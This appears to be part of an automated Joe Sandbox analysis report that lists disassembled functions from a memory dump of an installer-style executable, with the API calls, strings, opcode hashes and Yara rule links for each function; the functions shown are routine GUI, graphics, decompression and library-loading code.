API ID: Message$TextWindow$CurrentDispatchSendThreadTranslate
String ID: [Paused]
API String ID: 3744435275-4230553315
Opcode ID: 30f2530590a24191f7504455738b6e68ed9f6331a58c559f63864f9203593cc7
Instruction ID: d4d559e98c01fd19c9158a949e1c4478d2f8558c4a66ba59e997b8cb75d2eadd
Opcode Fuzzy Hash: 30f2530590a24191f7504455738b6e68ed9f6331a58c559f63864f9203593cc7
Instruction Fuzzy Hash: 7031D330904648AECB01DBB5DC51BAEBBB8EB09314F50447BEC04E3292D7789909CB29

Uniqueness

Uniqueness Score: -1.00%

Function 00464794 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99sleepCOMMON

Download Yara Rule

APIs

GetCursor.USER32(00000000,004648D3), ref: 00464850
LoadCursorA.USER32 ref: 0046485E
SetCursor.USER32(00000000,00000000,00007F02,00000000,004648D3), ref: 00464864
Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,004648D3), ref: 0046486E
SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,004648D3), ref: 00464874

Strings

CheckPassword, xrefs: 004647F8

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Cursor$LoadSleep
String ID: CheckPassword
API String ID: 4023313301-1302249611
Opcode ID: 18e40c631363f873b59ed07b8397dca0b357b36b41a77fd912bff81ad102a300
Instruction ID: eac744777a8890470a5a55a98f652c6345ef9197b5cde8571231044706295a57
Opcode Fuzzy Hash: 18e40c631363f873b59ed07b8397dca0b357b36b41a77fd912bff81ad102a300
Instruction Fuzzy Hash: FD318634644244AFE700EB69C88AB9D7BE5AF45304F5580B6B8049B3E2D778AE40CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041C210 Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041C110: GetObjectA.GDI32(?,00000018), ref: 0041C11D

GetFocus.USER32 ref: 0041C230
72E5AC50.USER32(?), ref: 0041C23C
72E5B410.GDI32(?,?,00000000,00000000,0041C2BB,?,?), ref: 0041C25D
72E5B150.GDI32(?,?,?,00000000,00000000,0041C2BB,?,?), ref: 0041C269
GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C280
72E5B410.GDI32(?,00000000,00000000,0041C2C2,?,?), ref: 0041C2A8
72E5B380.USER32(?,?,0041C2C2,?,?), ref: 0041C2B5

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: B410$B150B380BitsFocusObject
String ID:
API String ID: 514114485-0
Opcode ID: eff73aa052735073d2a1768d693beb2cfd617a757480bb56e518bfc57315f513
Instruction ID: c2976d6cd85da84569e921dd34d174535c44734310ef376fe1b2036df50ccd9e
Opcode Fuzzy Hash: eff73aa052735073d2a1768d693beb2cfd617a757480bb56e518bfc57315f513
Instruction Fuzzy Hash: 65111A71A40604BBDB10EBE9CC85FAFB7FCEB48700F15486AB518E7281D67899408B68

Uniqueness

Uniqueness Score: -1.00%

Function 00418D1C Relevance: 10.6, APIs: 7, Instructions: 67COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00418D38
GetSystemMetrics.USER32 ref: 00418D40
6F7A7CB0.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,?), ref: 00418D46

Part of subcall function 00409A8C: 6F7A0620.COMCTL32(?,000000FF,00000000,00418D74,00000000,00418DD0,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,?), ref: 00409A90

6F7FBC60.COMCTL32(?,00000000,00000000,00000000,00000000,00418DD0,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,?), ref: 00418D96
6F7FB6C0.COMCTL32(00000000,?,?,00000000,00000000,00000000,00000000,00418DD0,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418DA1
6F7FBC60.COMCTL32(?,00000001,?,?,00000000,?,?,00000000,00000000,00000000,00000000,00418DD0,?,00000000,0000000D,00000000), ref: 00418DB4
6F7A7D50.COMCTL32(?,00418DD7,?,00000000,?,?,00000000,00000000,00000000,00000000,00418DD0,?,00000000,0000000D,00000000,0000000E), ref: 00418DCA

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: MetricsSystem$A0620
String ID:
API String ID: 3249894280-0
Opcode ID: f155504e81d06e82f2dd16528ef757ae6e0c395946e4153f22485fb8567b04d7
Instruction ID: 83ea1bba3dd754c4722f5a4351d59464f51687baf460525fc32cad82f283ec05
Opcode Fuzzy Hash: f155504e81d06e82f2dd16528ef757ae6e0c395946e4153f22485fb8567b04d7
Instruction Fuzzy Hash: 50118971B40244BBDB10EBA5DC83F5E73F8DB48704F5145AAB604FB2C2D5799D408B18

Uniqueness

Uniqueness Score: -1.00%

Function 00488244 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

72E5AC50.USER32(00000000,?,?,00000000), ref: 00488255

Part of subcall function 0041A2B0: CreateFontIndirectA.GDI32(?), ref: 0041A36F

SelectObject.GDI32(00000000,00000000), ref: 00488277
GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,004886A5), ref: 0048828B
GetTextMetricsA.GDI32(00000000,?), ref: 004882AD
72E5B380.USER32(00000000,00000000,004882D7,004882D0,?,00000000,?,?,00000000), ref: 004882CA

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00488282

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Text$B380CreateExtentFontIndirectMetricsObjectPointSelect
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
API String ID: 3658053993-222967699
Opcode ID: e336c1ffe02ed2120a47a33971289be9318d51e85d146f97ddea82a5d36c50fb
Instruction ID: c86eba72dc87e027b10ab16d58a2fbe8e9f8e1ec00f713e495128ac661362904
Opcode Fuzzy Hash: e336c1ffe02ed2120a47a33971289be9318d51e85d146f97ddea82a5d36c50fb
Instruction Fuzzy Hash: 60016176A04608AFDB04EBE5CC41E5FB7ECDB48714F5104BAB604E72C1DA78AE108B28

Uniqueness

Uniqueness Score: -1.00%

Function 0041B52A Relevance: 10.6, APIs: 7, Instructions: 57windowCOMMON

Download Yara Rule

APIs

SelectObject.GDI32(00000000,?), ref: 0041B538
SelectObject.GDI32(?,00000000), ref: 0041B547
StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B573
SelectObject.GDI32(00000000,00000000), ref: 0041B581
SelectObject.GDI32(?,00000000), ref: 0041B58F
DeleteDC.GDI32(00000000), ref: 0041B598
DeleteDC.GDI32(?), ref: 0041B5A1

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ObjectSelect$Delete$Stretch
String ID:
API String ID: 1458357782-0
Opcode ID: 515d24f70a0cf549d0b2e059984d3bdd84f91c0b7063a8e7fed934d78969567d
Instruction ID: aadd17d00576477065a1616842709b51dddc5215e8da7aa7bf7294541355b014
Opcode Fuzzy Hash: 515d24f70a0cf549d0b2e059984d3bdd84f91c0b7063a8e7fed934d78969567d
Instruction Fuzzy Hash: FE117872E00619ABDF50DBD9E885FAFB3FCEB08304F004515B614EB281C6789D418BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0042345C Relevance: 10.6, APIs: 7, Instructions: 56threadwindowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 00423477
WindowFromPoint.USER32(?,?), ref: 00423484
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00423492
GetCurrentThreadId.KERNEL32 ref: 00423499
SendMessageA.USER32(00000000,00000084,?,?), ref: 004234B2
SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 004234C9
SetCursor.USER32(00000000), ref: 004234DB

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
String ID:
API String ID: 1770779139-0
Opcode ID: 81f00774b20a2a229e9ca12694f3ea788b77e9e61f70631baffb1ab651dbb8be
Instruction ID: 430ad60131859f11e65866b08c3df0807d4cd3ad5463abd474490cb6163e9c12
Opcode Fuzzy Hash: 81f00774b20a2a229e9ca12694f3ea788b77e9e61f70631baffb1ab651dbb8be
Instruction Fuzzy Hash: F001D43230421036D6217B765C82E6F22E8CB84B59F51417FB905AB282D93EAC10A3AD

Uniqueness

Uniqueness Score: -1.00%

Function 00488068 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll), ref: 00488078
6CAD5550.KERNEL32(00000000,MonitorFromRect,user32.dll), ref: 00488085
6CAD5550.KERNEL32(00000000,GetMonitorInfoA,00000000,MonitorFromRect,user32.dll), ref: 00488092

Strings

user32.dll, xrefs: 00488073
GetMonitorInfoA, xrefs: 0048808C
MonitorFromRect, xrefs: 0048807F

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: D5550$HandleModule
String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
API String ID: 973534670-2254406584
Opcode ID: 7db87c9fda0348b87a1a41c77383b14b85d3047ca445bb9fc7c36df8c17157e0
Instruction ID: 6e562e19ac84550870092a3c1b8ba6b0c0ac266d8b29f396ed82e57d191843af
Opcode Fuzzy Hash: 7db87c9fda0348b87a1a41c77383b14b85d3047ca445bb9fc7c36df8c17157e0
Instruction Fuzzy Hash: 77F09652B42A1527D23035690C81A7F228DCB967A4F96093FBE10B7282ED5D9C0847AD

Uniqueness

Uniqueness Score: -1.00%

Function 00459C98 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

6CAD5550.KERNEL32(10000000,ISCryptGetVersion,?,004746B3,00000000,004746DC), ref: 00459CA1
6CAD5550.KERNEL32(10000000,ArcFourInit,10000000,ISCryptGetVersion,?,004746B3,00000000,004746DC), ref: 00459CB1
6CAD5550.KERNEL32(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,004746B3,00000000,004746DC), ref: 00459CC1

Strings

ArcFourInit, xrefs: 00459CAB
ISCryptGetVersion, xrefs: 00459C9B
ArcFourCrypt, xrefs: 00459CBB

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: D5550
String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
API String ID: 183293030-508647305
Opcode ID: acb488890e5c2e2b379f4dcc6f739c5c26938aec1786831ae11f0791edab86da
Instruction ID: 55b88a5c9a895eb77ebb854db0f92e8eb359b5923d934d189e0fc1b8f0dc63c2
Opcode Fuzzy Hash: acb488890e5c2e2b379f4dcc6f739c5c26938aec1786831ae11f0791edab86da
Instruction Fuzzy Hash: 32F0F4B1A11A108FE728DF66AC8576B3BA5E785306B04847BF807916A2DB780848DE0C

Uniqueness

Uniqueness Score: -1.00%

Function 0045A198 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

6CAD5550.KERNEL32(00000000,BZ2_bzDecompressInit,?,0047454C,00000000,00474575), ref: 0045A1A1
6CAD5550.KERNEL32(00000000,BZ2_bzDecompress,00000000,BZ2_bzDecompressInit,?,0047454C,00000000,00474575), ref: 0045A1B1
6CAD5550.KERNEL32(00000000,BZ2_bzDecompressEnd,00000000,BZ2_bzDecompress,00000000,BZ2_bzDecompressInit,?,0047454C,00000000,00474575), ref: 0045A1C1

Strings

BZ2_bzDecompress, xrefs: 0045A1AB
BZ2_bzDecompressInit, xrefs: 0045A19B
BZ2_bzDecompressEnd, xrefs: 0045A1BB

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: D5550
String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
API String ID: 183293030-212574377
Opcode ID: 9f2a9bcdc621ac13df638437ea11ddaa6b8964c00a90bc92546b47afa8f0b326
Instruction ID: 94854f8a5b0d0740457f58f45d8c078d7974d2f116e12e67d2e521bd6c5c8b3f
Opcode Fuzzy Hash: 9f2a9bcdc621ac13df638437ea11ddaa6b8964c00a90bc92546b47afa8f0b326
Instruction Fuzzy Hash: D3F030B0E00A809ED704DF22AC857673F95A74A30AF20863BB80756AA2D77D0458CF1E

Uniqueness

Uniqueness Score: -1.00%

Function 0044C470 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleacc.dll,?,0044ED2D), ref: 0044C47F
6CAD5550.KERNEL32(00000000,LresultFromObject,oleacc.dll,?,0044ED2D), ref: 0044C490
6CAD5550.KERNEL32(00000000,CreateStdAccessibleObject,00000000,LresultFromObject,oleacc.dll,?,0044ED2D), ref: 0044C4A0

Strings

oleacc.dll, xrefs: 0044C47A
CreateStdAccessibleObject, xrefs: 0044C49A
LresultFromObject, xrefs: 0044C48A

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: D5550$LibraryLoad
String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
API String ID: 4129453343-1050967733
Opcode ID: d3c614515ba41650864abbc004c9112c3029005685b8966e8ed844b311a5e133
Instruction ID: af5fafed751ad919ba175a44a32b7430eff449043fbbe5ec937408c8bd9dc759
Opcode Fuzzy Hash: d3c614515ba41650864abbc004c9112c3029005685b8966e8ed844b311a5e133
Instruction Fuzzy Hash: 6EF01270A437519BF7606F61DED976A37A4E30031DF15593EA001961E1D7BC5444CF0D

Uniqueness

Uniqueness Score: -1.00%

Function 0044F3E8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 16COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,0048B7A2), ref: 0044F423
6CAD5550.KERNEL32(00000000,user32.dll,NotifyWinEvent,0048B7A2), ref: 0044F429

Strings

`,v, xrefs: 0044F42E
\ C, xrefs: 0044F400
NotifyWinEvent, xrefs: 0044F419
user32.dll, xrefs: 0044F41E

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: D5550HandleModule
String ID: NotifyWinEvent$\ C$`,v$user32.dll
API String ID: 920177481-561449860
Opcode ID: f23abb250f5d8cbd57fbc1a3597fd41e5b5c4fbf6de949d5700e8edf7e678f20
Instruction ID: a562bb83bf1e91672e59b0269b5ac662ec6ff40591448e8de7f393a80c299ec4
Opcode Fuzzy Hash: f23abb250f5d8cbd57fbc1a3597fd41e5b5c4fbf6de949d5700e8edf7e678f20
Instruction Fuzzy Hash: 38E0B6B0E027545AE601BFA69842B0E3BA0D75531CF20493FA900662A3CB7C44498F2E

Uniqueness

Uniqueness Score: -1.00%

Function 0041B5D0 Relevance: 9.1, APIs: 6, Instructions: 113windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0041B646
72E5AC50.USER32(?,00000000,0041B720,?,?,?,?), ref: 0041B652
72E5AD70.GDI32(?,00000068,00000000,0041B6F4,?,?,00000000,0041B720,?,?,?,?), ref: 0041B66E
72E5AEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B6F4,?,?,00000000,0041B720,?,?,?,?), ref: 0041B68B
72E5AEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B6F4,?,?,00000000,0041B720), ref: 0041B6A2
72E5B380.USER32(?,?,0041B6FB,?,?), ref: 0041B6EE

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: B380Focus
String ID:
API String ID: 3891926489-0
Opcode ID: 96cd0f549e70ce9be7b9710d4241d4da25a4f0c7083478d0b07e25f6b7abca35
Instruction ID: 11df3400f1eb03de84113c5c3ec4ebf7f10d2645e46e8c7fa1f075b946e55609
Opcode Fuzzy Hash: 96cd0f549e70ce9be7b9710d4241d4da25a4f0c7083478d0b07e25f6b7abca35
Instruction Fuzzy Hash: 3F41C831A001589FCF10DFA9C885AAFBBB4EF59704F1584AAF940EB351D7389D11CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00456A34 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 93COMMON

Download Yara Rule

APIs

Part of subcall function 0042C81C: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C840

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,0048DF30,00000FFF,00000000,00456B5B,?,?,00000000,0048D628), ref: 00456A9C

Part of subcall function 00456300: CloseHandle.KERNEL32(00000000), ref: 00456330
Part of subcall function 00456300: WaitForSingleObject.KERNEL32(00000000,00002710,00000000), ref: 0045635A
Part of subcall function 00456300: GetExitCodeProcess.KERNEL32 ref: 0045636A
Part of subcall function 00456300: CloseHandle.KERNEL32(00000000,00000000,?,00000000,00002710,00000000,00000001,00000000,00002710,00000000), ref: 004563B0
Part of subcall function 00456300: Sleep.KERNEL32(000000FA,00000000,00000000,?,00000000,00002710,00000000,00000001,00000000,00002710,00000000), ref: 004563C9

Part of subcall function 00456300: TerminateProcess.KERNEL32(00000000,00000001,00000000,00002710,00000000), ref: 0045634D

Strings

UnRegisterTypeLib, xrefs: 00456B2A
HelperRegisterTypeLibrary: StatusCode invalid, xrefs: 00456B36
ITypeLib::GetLibAttr, xrefs: 00456B0F
LoadTypeLib, xrefs: 00456AE1
RegisterTypeLib, xrefs: 00456AFD

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CloseHandleProcess$ByteCharCodeExitFullMultiNameObjectPathSingleSleepTerminateWaitWide
String ID: HelperRegisterTypeLibrary: StatusCode invalid$ITypeLib::GetLibAttr$LoadTypeLib$RegisterTypeLib$UnRegisterTypeLib
API String ID: 3965036325-83444288
Opcode ID: cf2a3a04fc8b757f2918928d542b7fec9a35e389a630b909b09c684119571e75
Instruction ID: 7b9cdc252f2b98f7b0b919fb9f5ead86ecc66f3806473bd0b3f3771be5b08ee5
Opcode Fuzzy Hash: cf2a3a04fc8b757f2918928d542b7fec9a35e389a630b909b09c684119571e75
Instruction Fuzzy Hash: BF31A230710114ABDB10EBA58952B5EB7A8DB04307F92847BBD05D7393EA3CAE09965D

Uniqueness

Uniqueness Score: -1.00%

Function 0041BE54 Relevance: 9.1, APIs: 6, Instructions: 71COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0041BE9D
GetSystemMetrics.USER32 ref: 0041BEA7
72E5AC50.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BEB1
72E5AD70.GDI32(00000000,0000000E,00000000,0041BF24,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BED8
72E5AD70.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BF24,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BEE5
72E5B380.USER32(00000000,00000000,0041BF2B,0000000E,00000000,0041BF24,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BF1E

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: MetricsSystem$B380
String ID:
API String ID: 3145338429-0
Opcode ID: 268c34d798b48d523a2a72084894ca833f9098c92c62758936d7a7a357cc6e81
Instruction ID: ab95e7bdbdf47fefe5665f381421f791bef747732ba1a7285d8139ec20da3399
Opcode Fuzzy Hash: 268c34d798b48d523a2a72084894ca833f9098c92c62758936d7a7a357cc6e81
Instruction Fuzzy Hash: 15215770E40648AFEB00EFA9C842BEEBBB4EF48704F10802AF515B7291D7795940CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00401A98 Relevance: 9.1, APIs: 6, Instructions: 59COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0048D420,00000000,00401B70), ref: 00401AC5
LocalFree.KERNEL32(00681DF8,00000000,00401B70), ref: 00401AD7
VirtualFree.KERNEL32(?,00000000,00008000,00681DF8,00000000,00401B70), ref: 00401AF6
LocalFree.KERNEL32(0067F9B8,?,00000000,00008000,00681DF8,00000000,00401B70), ref: 00401B35
RtlLeaveCriticalSection.KERNEL32(0048D420,00401B77), ref: 00401B60
RtlDeleteCriticalSection.KERNEL32(0048D420,00401B77), ref: 00401B6A

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

